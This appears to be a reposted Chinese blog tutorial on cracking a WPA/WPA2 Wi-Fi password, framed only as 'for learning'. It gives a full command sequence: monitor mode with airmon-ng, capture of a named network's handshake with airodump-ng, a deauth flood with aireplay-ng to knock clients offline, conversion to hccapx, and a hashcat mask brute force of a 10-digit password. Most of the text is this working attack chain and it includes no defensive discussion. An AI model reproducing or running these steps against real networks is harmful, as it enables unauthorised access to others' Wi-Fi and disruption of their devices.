Kali Aircrack

您所在的位置:网站首页 kali linux wifi握手包破解 Kali Aircrack

Kali Aircrack

2023-09-29 07:49| 来源: 网络整理| 查看: 265

Kali Aircrack-NG HashCat 破解Wi-Fi密码

假日无事,某网站购入TL-WN722N Kali免驱网卡,扫描一下附近网络试试 仅学习使用

1.设备概要 TL-WN722N Kali免驱网卡MacBook Pro (Parallels Desktop)Kali镜像 https://www.kali.org/get-kali/个人博客: https://blog.ztfot.com/?p=290 2.破解WPA/WPA2类WI-FI操作(Root下操作):

用Parallels Desktop 安装Kali Linux,并且接入无线网卡

2.1查看可用无线网卡 airmon-ng

在这里插入图片描述

2.2启用网卡监听模式 airmon-ng start wlan0

使用iwconfig确认已经开启网卡监听模式,主要表现是,网卡名称wlan0变为wlan0mon, Mode:Monitor

在这里插入图片描述

2.3扫描周围Wi-Fi airodump-ng wlan0mon

BSSID -- Wi-Fi的Mac地址 PWR -- 信号强度 Data -- 监听期间流量总和 CH -- WI-FI所用信道 ENC -- 加密算法 ESSID -- Wi-Fi名称

看到需要破解的WI-FI按下Ctrl +C 终止 我们的目标名是 ChinaNet-zLAp BSSID : 8C:53:C3:DA:77:F7 CH : 6

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EGjssNUT-1652855895563)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a16223c7-251a-4e00-9911-e0ff3d6cb24b/Untitled.png)]

2.4抓取握手包并保存为CAP文件 airodump-ng --bssid 8C:53:C3:DA:77:F7 -c 6 -w /root/ChinaNet-zLAp wlan0mon # -bssid 指定要破解的WI-FI BSSID 值 # -c 指定要破解的Wi-Fi的信道 # -w 捕获到的握手包文件名

在这里插入图片描述

2.5 主动对设备断网获取握手包

上一步中我们是被动等待 (以前我没有kali linux以及网卡的时候,MacBook就一直挂着等待很久很久~~)

但对于上面已经连上Wi-Fi的设备,我们可以使用aireplay-ng 进行deauth洪水攻击使其设备掉线,掉线的设备会自动重新连上Wi-Fi,此时我们就可以获得握手包

保持上步抓包命令不中断,新开一个窗口执行(我们选取信号最好的 PWR = -12 ):

aireplay-ng -0 10 -a 8C:53:C3:DA:77:F7 -c 28:6C:07:29:D9:A2 wlan0mon # -0 表示断开设备连接 # 10 表示deauth攻击次数 # -a 为Wi-Fi的BSSID # -c 表示让连接设备失效的设备BSSID地址,为上图中STATION地址

在这里插入图片描述

上图为洪水攻击过程(攻击过程十分明显,因为我连网的智能台灯熄灭重启了)

如图所示,我们已经抓到了重新认证的 28:6C:07:29:D9:A2 的握手包,使用Ctrl +C终止抓包

在这里插入图片描述

此时会在指定目录下产生文件(每次抓包后会产生一组,留意数字为第几次执行的)

在这里插入图片描述

3.暴力破解CAP文件

字典配合Aircrack-ng效率有点低(CPU破解),所以我们使用HashCat(GPU)破解WPA/WPA2的握手包

由于HashCat无法直接破解CAP文件,所以我们得将其转化为HCCAPX文件

去官网转换,https://hashcat.net/cap2hccapx/ 如图

在这里插入图片描述

或者使用工具(hashcat-utils的cap2hccapx):

下载地址:https://github.com/hashcat/hashcat-utils/releases/

cd hashcat-utils-1.9/bin && chmod +x cap2hccapx.bin

将CAP文件转化为HCCAPX文件:

在这里插入图片描述

因为抓包了好几次,所以这里出现3个,只要有其中的一个就可以了,如果没有,那就是抓包失败了 3.1使用HashCat破解 找了一台有独显的笔记本,MacBook核显计算??.. hashcat -a 3 -m 2500 ChinaNet-zLAp-01.hccapx "?d?d?d?d?d?d?d?d?d?d" # -a attack_mode [ 0 Straight(字典破解) 1 Combination(组合破解) 3 Brute-force(掩码暴力破解)] # -m 2500 破解WPA2 hccapx文件 #'?d' 一个'?d'表示一个数字,我这里是10位数数字密码,常用掩码类型如下: # ? | Charset # ===+========= # l | abcdefghijklmnopqrstuvwxyz # u | ABCDEFGHIJKLMNOPQRSTUVWXYZ # d | 0123456789 # h | 0123456789abcdef # H | 0123456789ABCDEF # s | !"#$%&'()*+,-./:;?@[\]^_`{|}~ # a | ?l?u?d?s

按下**’s’**了解最新破解信息(Wi-Fi是10位数数字密码,GTX 850M 最久需要两天。。)

在这里插入图片描述 过了很久,密码破解成功,如图: 在这里插入图片描述



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3